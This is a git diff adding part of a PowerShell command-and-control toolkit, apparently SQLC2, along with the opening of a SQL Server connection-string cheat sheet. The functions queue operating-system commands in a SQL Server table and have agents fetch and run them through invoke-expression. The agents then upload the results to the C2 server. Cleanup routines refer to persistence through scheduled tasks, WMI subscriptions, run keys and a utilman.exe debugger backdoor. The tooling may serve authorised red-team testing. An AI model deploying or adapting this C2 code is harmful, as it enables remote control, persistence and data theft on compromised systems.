Command: $Command" + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Set command for single agent + $Query = "INSERT dbo.C2COMMANDS (ServerName,Command,Status) VALUES ('$ServerName','$Command','pending')" + + # Execute Query + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database $Database -SuppressVerbose + + Write-Verbose "$instance : Command added for $ServerName agent(s)." + } + + End + { + # Return data + $TblResults + } +} + + +# ---------------------------------- +# Get-SQLC2Command +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLC2Command +{ + <# + .SYNOPSIS + This command gets a command from a table on a remote c2 SQL Server. + This command should be run on the c2 agent system so it can pull down + any commands the C2 server has for it to execute. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name that contains target table. + .PARAMETER Execute + Run all of the commands downloaded from the C2 server on the agent system. + .EXAMPLE + PS C:\> Get-SQLC2Command -Instance "SQLServer1\STANDARDDEV2014" -Database database1 + .EXAMPLE + PS C:\> Get-SQLC2Command -Instance "SQLServer1\STANDARDDEV2014" -Database database1 -Execute + .EXAMPLE + PS C:\> Get-SQLC2Command -Username CloudAdmin -Password 'CloudPassword!' -Instance cloudserver1.database.windows.net -Database database1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database containing target C2 table.')] + [string]$Database, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Execute commands from c2.')] + [switch]$Execute, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose "$instance : Attempting to grab commands to execute." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Check in the server + Register-SQLC2Agent -Username $Username -Password $Password -Instance $Instance -Database $Database -SuppressVerbose | Out-Null + + # Setup query to grab commands + $Query = "SELECT * FROM dbo.c2commands where status like 'pending' and (servername like '$env:COMPUTERNAME' or servername like 'All')" + + # Execute Query + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database $Database -SuppressVerbose + + # check command count + $CommandCount = $TblResults | measure | select count -ExpandProperty count + + Write-Verbose "$instance : $CommandCount commands were found for $env:COMPUTERNAME." + } + + End + { + # Process command execution + if($Execute){ + + # Loop through pending commands + $TblResults | ForEach-Object { + + # Grab command + $C2CommandId = $_.cid + $C2Command = $_.command + + # Execute command + Invoke-SQLC2Command -Username $Username -Password $Password -Instance $Instance -Database $Database -Verbose -Command $C2Command -Cid $C2CommandId + } + }else{ + + # Return data + $TblResults + } + } + } + + +# ---------------------------------- +# Invoke-SQLC2Command +# ---------------------------------- +# Author: Scott Sutherland +Function Invoke-SQLC2Command +{ + <# + .SYNOPSIS + This command should be run on the agent system. It will execute a OS command locally and + return the results to the C2 SQL Server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name that contains target table. + .PARAMETER Command + The OS command to run. + .EXAMPLE + PS C:\> Invoke-SQLC2Command -Instance "SQLServer1\STANDARDDEV2014" -Database database1 + PS C:\> Invoke-SQLC2Command -Username CloudAdmin -Password 'CloudPassword!' -Instance cloudserver1.database.windows.net -Database database1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database containing target C2 table.')] + [string]$Database, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'The OS command to run.')] + [string]$Command, + + [Parameter(Mandatory = $true, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'This is the unique command id provide from the server.')] + [Int]$Cid, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + } + + Process + { + Write-Verbose "$env:COMPUTERNAME : Running command $Cid" + Write-Verbose "$env:COMPUTERNAME : Command: $Command" + + # Run the command + try{ + $CommandResults = invoke-expression "$Command" + Write-Verbose "$env:COMPUTERNAME : Command complete." + $CommandStatus = "success" + }catch{ + Write-Verbose "$env:COMPUTERNAME : Command failed. Aborting." + $CommandStatus = "failed" + } + + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Check in the server + Register-SQLC2Agent -Username $Username -Password $Password -Instance $Instance -Database $Database -SuppressVerbose | Out-Null + + # Setup query to grab commands + Write-Verbose -Message "$Instance : Uploading command results to C2 server." + $Query = " + -- update command request from server + UPDATE dbo.C2COMMANDS SET lastupdate = (select GETDATE ()),result = '$CommandResults',status='$CommandStatus',command='$Command' + WHERE CID like $Cid" + + # Execute Query + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database $Database -SuppressVerbose + + Write-Verbose "$instance : Upload complete." + } + + End + { + # Return data + $TblResults + } + } + + +# ---------------------------------- +# Get-SQLC2Result +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLC2Result +{ + <# + .SYNOPSIS + This function gets command results from the C2 SQL Server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name that contains target table. + .PARAMETER ServerName + Filter by server name. + .PARAMETER Cid + Filter by command id. + .PARAMETER Status + Filter by status. + .EXAMPLE + PS C:\> Get-SQLC2Result -Instance "SQLServer1\STANDARDDEV2014" -Database database1 + PS C:\> Get-SQLC2Result -Instance "SQLServer1\STANDARDDEV2014" -Database database1 -Cid 1 + PS C:\> Get-SQLC2Result -Instance "SQLServer1\STANDARDDEV2014" -Database database1 -Status "Success" + PS C:\> Get-SQLC2Result -Instance "SQLServer1\STANDARDDEV2014" -Database database1 -ServerName "Server1" + PS C:\> Get-SQLC2Result -Username CloudAdmin -Password 'CloudPassword!' -Instance cloudserver1.database.windows.net -Database database1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database containing target C2 table.')] + [string]$Database, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Filter by server name.')] + [string]$ServerName, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Filter by Status.')] + [ValidateSet("pending","success","failed")] + [string]$Status, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Filter by command ID.')] + [string]$Cid, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + + # Create ServerName filter + if($ServerName){ + $FilterServerName = "WHERE servername like '$ServerName'" + }else{ + $FilterServerName = "" + } + + # Create Status filter + if($Status){ + $FilterStatus = "WHERE status like '$Status'" + }else{ + $FilterStatus = "" + } + + + # Create ServerName filter + if($Cid){ + $FilterCid = "WHERE cid like '$Cid'" + }else{ + $FilterCid = "" + } + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose "$instance : Attempting to grab pending and processed commands." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Setup query to grab commands + $Query = " + SELECT * FROM dbo.c2commands + $FilterServerName + $FilterStatus + $FilterCid + " + + # Execute Query + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database $Database -SuppressVerbose + + # check command count + $CommandCount = $TblResults.row.count + + Write-Verbose "$instance : $CommandCount commands were found." + } + + End + { + # Return data + $TblResults + } + } + + +# ---------------------------------- +# Remove-SQLC2Command +# ---------------------------------- +# Author: Scott Sutherland +Function Remove-SQLC2Command +{ + <# + .SYNOPSIS + This command clears the command history on the remote c2 SQL Server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER DatabaseName + Database name that contains target table. + .PARAMETER ServerName + Server name to clear command history for. + .EXAMPLE + PS C:\> Remove-SQLC2Command -Instance "SQLServer1\STANDARDDEV2014" -Database database1 + .EXAMPLE + PS C:\> Remove-SQLC2Command -Instance "SQLServer1\STANDARDDEV2014" -Database database1 -ServerName Server1 + .EXAMPLE + PS C:\> Remove-SQLC2Command -Username CloudAdmin -Password 'CloudPassword!' -Instance cloudserver1.database.windows.net -Database database1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database containing target C2 table.')] + [string]$Database, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Server to clear command history for.')] + [string]$ServerName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + + if($ServerName){ + $ServerFilter = "WHERE servername like '$ServerName'" + }else{ + $ServerFilter = "" + } + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose "$instance : Attempting to clear command history from $Instance." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Setup query to grab commands + $Query = "DELETE FROM dbo.C2COMMANDS + $ServerFilter" + + # Execute Query + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database $Database -SuppressVerbose + } + + End + { + Write-Verbose "$instance : Done." + } + } + + +# ---------------------------------- +# Remove-SQLC2Agent +# ---------------------------------- +# Author: Scott Sutherland +Function Remove-SQLC2Agent +{ + <# + .SYNOPSIS + This command clears the agents registered on the remote c2 SQL Server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DatabaseName + Database name that contains target table. + .PARAMETER ServerName + Server name to clear command history for. + .EXAMPLE + PS C:\> Remove-SQLC2Agent -Instance "SQLServer1\STANDARDDEV2014" -Database database1 + .EXAMPLE + PS C:\> Remove-SQLC2Agent -Instance "SQLServer1\STANDARDDEV2014" -Database database1 -ServerName Server1 + .EXAMPLE + PS C:\> Remove-SQLC2Agent -Username CloudAdmin -Password 'CloudPassword!' -Instance cloudserver1.database.windows.net -Database database1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database containing target C2 table.')] + [string]$Database, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Server to clear command history for.')] + [string]$ServerName, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + + if($ServerName){ + $ServerFilter = "WHERE servername like '$ServerName'" + }else{ + $ServerFilter = "" + } + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose "$instance : Attempting to clear agent(s) from $Instance." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Setup query to grab commands + $Query = "DELETE FROM dbo.C2AGENTS + $ServerFilter" + + # Execute Query + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database $Database -SuppressVerbose + } + + End + { + Write-Verbose "$instance : Done." + } + } + + +# ---------------------------------- +# Uninstall-SQLC2AgentPs +# ---------------------------------- +# Author: Scott Sutherland +Function Uninstall-SQLC2AgentPs +{ + <# + .SYNOPSIS + This command removes the SQLC2 scheduled task and WMI subscription agent beacons from the current system. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + .EXAMPLE + PS C:\> Uninstall-SQLC2AgentPs -verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + Write-Verbose "Attempting to remove the SQLC2 persistence methods." + } + + Process + { + # Remove the schedule tasks + Write-Verbose "Remove Scheduled Task." + if((Get-ScheduledTask -TaskName "SQLC2AgentPS*" | Measure-Object | Select Count -ExpandProperty Count) -eq 1) + { + try{ + Unregister-ScheduledTask -TaskName "SQLC2AgentPS" -Confirm:$false + Write-Verbose " - Scheduled task removed." + }catch{ + Write-Verbose " - Task could not be removed." + } + }else{ + Write-Verbose " - SQLC2PS Scheduled task does not exist." + } + + <# + # Remove the WMI subscription + Write-Verbose "Remove WMI Subscription." + + # Remove WMI Filter + # Write-Verbose " - Checking for filter." + if((Get-WmiObject -Namespace root/subscription -Class __EventFilter | where name -like “*SQLC2PS_Filter*”).count -eq 1) + { + Write-Verbose " - Removing SQLC2AgentPS WMI filter." + Get-WmiObject -Namespace root/subscription -Class __EventFilter | where name -like “*SQLC2AgentPS_Filter*” | Remove-WmiObject + }else{ + Write-Verbose " - SQLC2AgentPS WMI filter does not exist." + } + + # Remove WMI Consumer + # Write-Verbose " - Checking for consumer." + if((Get-WmiObject -Namespace root/subscription -Class __EventConsumer | where name -like “SQLC2AgentPS_Consumer*”).count -eq 1) + { + Write-Verbose " - Removing SQLC2AgentPS WMI consumer." + Get-WmiObject -Namespace root/subscription -Class __EventConsumer | where name -like “SQLC2AgentPS_Consumer*” | Remove-WmiObject + }else{ + Write-Verbose " - SQLC2AgentPS WMI consumer does not exist." + } + + # Remove WMI Binding + # Write-Verbose " - Checking for binding." + if((Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding | where name -like “*SQLC2AgentPS_Binding*”).count -eq 1) + { + Write-Verbose " - Removing SQLC2AgentPS WMI binding." + Get-WmiObject -Namespace root/subscription -Class __FilterToConsumerBinding | where name -like “*SQLC2AgentPS_Binding*” | Remove-WmiObject + }else{ + Write-Verbose " - SQLC2AgentPS WMI binding does not exist." + } + #> + + # Remove the registry run keys + Write-Verbose "Remove registry run keys." + try{ + Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ -Name SQLC2AgentPS -ErrorAction Stop | Out-Null + Remove-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ -Name SQLC2AgentPS -ErrorAction SilentlyContinue | Out-Null + Write-Verbose " - Registry run keys removed." + }catch{ + Write-Verbose " - SQLC2AgentPS run registry key does not exist." + } + + # Remove utilman.exe debugger from registry + Write-Verbose "Remove utilman.exe debugger registry keys." + if(Test-Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\") + { + try{ + Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" + Write-Verbose " - Utilman.exe debugger registry keys removed." + }catch{ + Write-Verbose " - Unable to remove registry key HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe." + } + }else{ + Write-Verbose " - SQLC2AgentPS utilman.exe debugger registry key does not exist." + } + + # Remove payload from registry + Write-Verbose "Remove payload registry keys." + if(Test-Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SQLC2AgentPS\) + { + try{ + Remove-Item -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SQLC2AgentPS\ + Write-Verbose " - Registry keys removed." + }catch{ + Write-Verbose " - Unable to remove registry key HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SQLC2AgentPS\." + } + }else{ + Write-Verbose " - SQLC2AgentPS payload registry key does not exist." + } + } + + End + { + } + } + + +# ---------------------------------- +# Uninstall-SQLC2AgentLink +# ---------------------------------- +# Author: Scott Sutherland +Function Uninstall-SQLC2AgentLink +{ + <# + .SYNOPSIS + This command removes the C2 server link and agent job from the agent SQL Server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + The instance of the C2 link agent. + .EXAMPLE + PS C:\> Uninstall-SQLC2Agent -Verbose -Instance "SQLServer1\STANDARDDEV2014" -Username sa -Password 'MyPassword123!' + .EXAMPLE + PS C:\> Uninstall-SQLC2Agent -Verbose -Instance "SQLServer1\STANDARDDEV2014" + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + + if($ServerName){ + $ServerFilter = "WHERE servername like '$ServerName'" + }else{ + $ServerFilter = "" + } + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose "$instance : Attempting to remove the C2 link agent on $Instance." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Setup query + $Query = " + -- Remove server link to SQL C2 Server + IF (SELECT count(*) FROM master..sysservers WHERE srvname = 'SQLC2Server') = 1 + exec sp_dropserver 'SQLC2Server', 'droplogins'; + else + select 'The server link does not exist.' + + -- Remove C2 agent job + IF (SELECT count(*) FROM [msdb].[dbo].[sysjobs] job WHERE name like 'SQLC2 Agent Job') = 1 + EXEC msdb..sp_delete_job @job_name = N'SQLC2 Agent Job' ; + else + select 'The agent job does not exist.'" + + # Execute Query + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database $Database -SuppressVerbose + } + + End + { + Write-Verbose "$instance : Done." + } + } + + +# ---------------------------------- +# Uninstall-SQLC2Server +# ---------------------------------- +# Author: Scott Sutherland +Function Uninstall-SQLC2Server +{ + <# + .SYNOPSIS + This command removes the C2 related tables on the C2 SQL Server. + .PARAMETER Instance + C2 SQL Server instance. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .EXAMPLE + PS C:\> Uninstall-SQLC2Server -Verbose -Instance "mysqlserver.database.windows.net" -Database Database1 -Username sa -Password 'MyPassword123!' + .EXAMPLE + PS C:\> Uninstall-SQLC2Server -Verbose -Instance "SQLServer1\STANDARDDEV2014" -Database Database1 + #> + [CmdletBinding()] + Param( + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server database used to store the C2 tables.')] + [string]$Database, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + Write-Verbose "$instance : Attempting to remove the C2 tables from $Database database on $Instance." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + # Setup query to grab commands + $Query = " + + -- Remove command table + IF(SELECT count(*) FROM [INFORMATION_SCHEMA].[TABLES] WHERE TABLE_NAME like 'C2COMMANDS') = 1 + DROP TABLE C2COMMANDS + ELSE + SELECT 'C2COMMANDS table does not exist.' + + -- Remove agent table + IF(SELECT count(*) FROM [INFORMATION_SCHEMA].[TABLES] WHERE TABLE_NAME like 'C2AGENTS') = 1 + DROP TABLE C2AGENTS + ELSE + SELECT 'C2AGENTS table does not exist.'" + + # Execute Query + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database $Database -SuppressVerbose + if(($TblResults | Measure-Object | Select count -ExpandProperty count) -eq 1){ + Write-Verbose -Message "$Instance : C2 tables did not exist." + } + } + + End + { + Write-Verbose "$instance : Please note that any databases create with have to be removed manually." + Write-Verbose "$instance : Done." + } + } diff --git a/templates/CheatSheet_ConnectionStrings.txt b/templates/CheatSheet_ConnectionStrings.txt new file mode 100644 index 0000000..fcf3adc --- /dev/null +++ b/templates/CheatSheet_ConnectionStrings.txt @@ -0,0 +1,184 @@ +Below is a cheatsheet for creating SQL Server client connection strings and finding them in common configuration files. + +------------------------------------------------------------------ +CREATING CONNECTION STRINGS +------------------------------------------------------------------ + +---------------------- +Authentication Options +---------------------- + +Current Windows Account +Server=Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1" + +Provided Windows Account +Server=Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1;uid=Domain\Account;pwd=Password;" + +Provided SQL Login +Server=Server\Instance;Database=Master;Connection Timeout=1;User ID=Username;Password=Password;" + + +----------------------- +Connection Type Options +----------------------- + +TCP/IP +Server=TCP:Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1" + +Named Pipes +Connecting to instances by name, forcing a named pipes connection. +Server=np:Server;Database=Master;Integrated Security=SSPI;Connection Timeout=1" +Server=np:Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1" +Default instance: Server=\\APPHOST\pipe\unit\app;Database=Master;Integrated Security=SSPI;Connection Timeout=1" +Named instance: Server=\\APPHOST\pipe\MSSQL$SQLEXPRESS\SQL\query;Database=Master;Integrated Security=SSPI;Connection Timeout=1" + +VIA +Server=via:Server\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1" + +Shared Memory +Server=lpc:Servername\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1" 